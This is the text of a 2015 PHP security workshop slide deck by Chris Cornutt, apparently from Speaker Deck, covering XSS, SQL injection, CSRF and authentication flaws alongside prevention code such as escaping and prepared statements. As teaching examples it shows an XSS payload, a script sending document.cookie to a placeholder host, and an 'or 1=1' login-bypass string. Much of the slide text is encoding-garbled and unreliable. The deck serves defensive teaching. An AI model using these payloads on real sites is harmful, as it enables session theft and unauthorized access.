Upgrade to Pro — share decks privately, control downloads, hide ads and more …

PHP Security Bootcamp

Chris Cornutt
April 18, 2015
Technology
2
190

PHP Security Bootcamp

The web is becoming a more and more dangerous place every day. You, as a PHP application developer, need to be armed with the tools and knowledge to make your applications as secure as possible. Come get hands-on training in applying secure design principles, testing code for vulnerabilities and fixing the problems we find together. We'll be using a vulnerable application to illustrate some of the most common vulnerabilities like cross-site scripting, SQL injection and other notables from the OWASP Top 10 list. You'll walk away with a grasp of good secure coding practices and a platform for future experimentation.

At Lone Star PHP 2015

Chris Cornutt

April 18, 2015
Tweet

More Decks by Chris Cornutt

See All by Chris Cornutt
Securing Legacy Applications
ccornutt
0
83
Pentesting for Developers
ccornutt
0
88
Securing Legacy Applications - Longhorn PHP 2018
ccornutt
1
140
Pieces of Auth
ccornutt
0
270
Securing Legacy Applications
ccornutt
0
280
Build Security In
ccornutt
0
140
Introduction to Slim 3
ccornutt
0
130
Securing Legacy Applications
ccornutt
0
32
PHP Security, Redfined
ccornutt
0
220

Other Decks in Technology

See All in Technology
PHPerKaigi 2023に行こう! / Let's Attend PHPerKaigi 2023!
tomzoh
1
100
CloudFront + S3環境から Cloudflare R2 + Workers環境に移行した話
teckl
3
1.2k
アフリカの通信・教育問題をNTN×Edtechで解決!
sbtechnight
PRO
0
310
MSPサービスを支えるIaCのこれまでとこれから
sbtechnight
PRO
0
330
Autonomous Database Cloud 技術詳細 / adb-s_technical_detail_jp
oracle4engineer
PRO
10
24k
生成AIで文化を創造する(ChatGPT作成タイトル)
sbtechnight
PRO
0
320
失敗例から学ぶAWSセキュリティサービスの導入
yhana
0
3k
SNS投稿を使ってクラウド障害を検知してみた
sbtechnight
PRO
0
340
Kubernetes + containerd で cgroup v2 に移行したら "failed to create fsnotify watcher" エラーが発生する原因と対策
superbrothers
0
330
「はたらく」前に知るべきIT企業5つのヒミツ 〜プロが教えるプロダクト開発最前線〜 / geeksai_2023spring
visional_engineering_and_design
0
200
インターネットの最新技術をモバイル網に持ち込んで最強のエッジコンピューティング基盤を作ってみた
sbtechnight
PRO
0
320
JAWS-UG 朝会 #43 登壇資料
takakuni
0
390

Featured

See All Featured
No one is an island. Learnings from fostering a developers community.
thoeni
12
1.6k
Stop Working from a Prison Cell
hatefulcrawdad
264
18k
Fontdeck: Realign not Redesign
paulrobertlloyd
74
4.4k
Building Flexible Design Systems
yeseniaperezcruz
314
35k
The Straight Up "How To Draw Better" Workshop
denniskardys
226
130k
Optimizing for Happiness
mojombo
366
65k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
7
4.9k
Into the Great Unknown - MozCon
thekraken
4
370
A Tale of Four Properties
chriscoyier
149
21k
Unsuck your backbone
ammeep
659
56k
Automating Front-end Workflow
addyosmani
1351
200k
Writing Fast Ruby
sferik
613
58k

Transcript

  1. Secure PHP Development
    $ISJT$PSOVUU!FOZHNB

    View Slide

  2. 1)1%FW:FBST
    "QQTFD&OHJOFFS
    IUUQXFCTFDJP
    IUUQTFDVSJOHQIQDPN

    View Slide

  3. Goals
    #BTJDBQQTFDQSJODJQMFT
    7VMOFSBCJMJUJFT&YQMPJUT
    )BOETPOFYQFSJFODF
    5PPMT5FDIOJRVFT

    View Slide

  4. IUUQCJUMZPXBTQUPQ

    View Slide

  5. 5IFSF`T
    OPTVDIUIJOH
    BTTFDVSF

    View Slide

  6. IUUQTHJUIVCDPNQTFDJPOPUDI
    /PUDI"7VMOFSBCMF"QQMJDBUJPO

    View Slide

  7. IUUQTHJUIVCDPNQTFDJPOPUDI
    4FUVQ5JNF
    PSIUUQOPUDITFDVSJOHQIQDPN

    View Slide

  8. View Slide

  9. XSS:
    Cross Site Scripting

    View Slide

  10. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF
    VTVBMMZ+BWBTDSJQU
    SFqFDUFEWTTUPSFE
    QPPSPVUQVUFTDBQJOH

    View Slide

  11. $44
    +BWBTDSJQU
    )5.-
    )5.-"UUSJCVUF
    2VFSZWBMVF
    Context
    style: foo-=$input?>
    var name = “=$input?>”;
    =$input?>
    ”>foo
    $url = “http://foo.com?data=“.$input

    View Slide

  12. Example
    echo “Howdy, my name is “.$_GET[‘name’];
    ?>
    ?name=alert(“xss”)

    View Slide

  13. Example
    <br/>xmlhttp = new XMLHttpRequest();<br/>xmlhttp.open(<br/>'GET',<br/>‘http://leethack.php?cookies=‘+document.cookie,<br/>true);<br/>xmlhttp.send();<br/>
    "TTVNFTDSPTTPSJHJOQPMJDZPG

    View Slide

  14. Your Turn

    View Slide

  15. Prevention #1
    $name = htmlspecialchars(
    $_GET[‘name’], ENT_COMPAT, ‘UTF-8’
    );
    echo “Howdy, my name is “.$name;
    ?>
    /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

    View Slide

  16. Prevention #2
    {{ name|e(‘html’) }}
    {{ name|e(‘html_attr’) }}
    {{ name|e(‘js’) }}
    {{ name|e(‘css’) }}
    /PUF5IJTFYBNQMFSFRVJSFT5XJH

    View Slide

  17. SQLi:
    SQL Injection

    View Slide

  18. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT
    FYQPTFEBUB
    CZQBTTBVUINFDIBOJTNT
    QPPSJOQVUpMUFSJOH

    View Slide

  19. Example
    $sql = ‘select id
    from users
    where username = “‘.$_POST[‘username’].’”
    and password = “‘.$_POST[‘password’].’”’;
    password=‘ or 1=1; #
    select id
    from users
    where username = “user1”
    and password = “” or 1=1; #

    View Slide

  20. [email protected]
    [email protected]@[email protected]
    [email protected]@[email protected]

    View Slide

  21. [email protected]
    [email protected]@[email protected]
    [email protected]@[email protected]
    X

    View Slide

  22. 1SFQBSFETUBUFNFOUT
    1%0
    .ZTRMJ

    View Slide

  23. Your Turn

    View Slide

  24. Prevention
    $stmt = $dbh->prepare(‘select id from users’
    .’ where username = :user’
    .’ and password = :pass’);
    $stmt->execute(array(
    ‘user’ => $_POST[‘username’],
    ‘pass’ => $_POST[‘password’]
    ));
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
    ?>
    /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

    View Slide

  25. CSRF:
    Cross Site Request
    Forgery

    View Slide

  26. VOWBMJEBUFEGPSNTVCNJTTJPO
    POBMMTUBUFDIBOHFT
    XIBU`TUIFTPVSDF
    TJNQMF
    SBOEPNJ[FE GPSFBDIGPSN

    View Slide

  27. Example





    View Slide

  28. Example




    value=“098f6bcd4621d373cade4e832627b4f6”
    name=“csrf-token”/>

    View Slide

  29. Auth*:
    Authentication &
    Authorization

    View Slide

  30. EJSFDUPCKFDUSFGFSFODF "

    EBUBBDDFTT
    EBOHFSPVTBDUJPOT
    QPPSVTFSNBOBHFNFOU

    View Slide

  31. Your Turn

    View Slide

  32. QMBJOUFYUQBTTXPSET
    OPQBTTXPSEQPMJDZ
    PWFSMZDPNQMFYQBTTXPSET
    QBTTXPSEIJOUT

    View Slide

  33. View Slide

  34. View Slide

  35. But wait, there’s
    more…

    View Slide

  36. 4FDVSJUZ.JTDPOpHVSBUJPO
    4FOTJUJWF%BUB&YQPTVSF
    $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT
    6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

    View Slide

  37. 5IBU`TBMMGPMLT
    !FOZHNB
    !TFDVSJOHQIQ
    IUUQTFDVSJOHQIQDPN

    View Slide